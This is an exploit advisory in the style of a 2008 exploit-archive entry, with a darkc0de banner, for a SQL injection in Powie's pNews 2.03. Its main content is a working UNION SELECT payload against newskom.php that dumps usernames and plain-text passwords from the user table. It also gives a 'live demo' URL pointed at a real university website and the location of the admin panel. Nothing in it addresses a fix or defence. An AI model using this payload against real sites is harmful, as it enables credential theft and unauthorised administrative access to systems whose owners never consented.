[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : pNews 2.03 (newsid) Remote SQL Injection Vulnerability
# Published : 2008-09-12
# Author : r45c4l
# Previous Title : vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability
# Next Title : WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability


################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____    _      __| _/____    # 
#    / __ |__  \_  __   |/ // ___/  /_    / __ |/ __    # 
#   / /_/ | / __ |  | /    <  ___  _/   / /_/   ___/   # 
#   ____ |(______/__|  |__|_ \_____>_____  /_____|____   # 
#        /                  /             /                 # 
#                   ___________   ______  _  __                # 
#                 _/ ____  __ _/ __  / / /                # 
#                   ___|  | /  ___/     /                 # 
#                  ___  >__|    ___  >/_/                  # 
#      est.2007        /            /   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit

#
# Vendor:  http://www.powie.de

# 
#
###########################################################
#
# d0rk:n/a
#
###########################################################
 
     Exploit:-
	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     
     
     Live Demo: 
	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*

     Admin panel is at http://site.com/script/admin/ 

     The password in in plain text :P	

###########################################################
#
#  Bug discovered : 12 Sep.2008
###########################################################

# www.Syue.com [2008-09-12]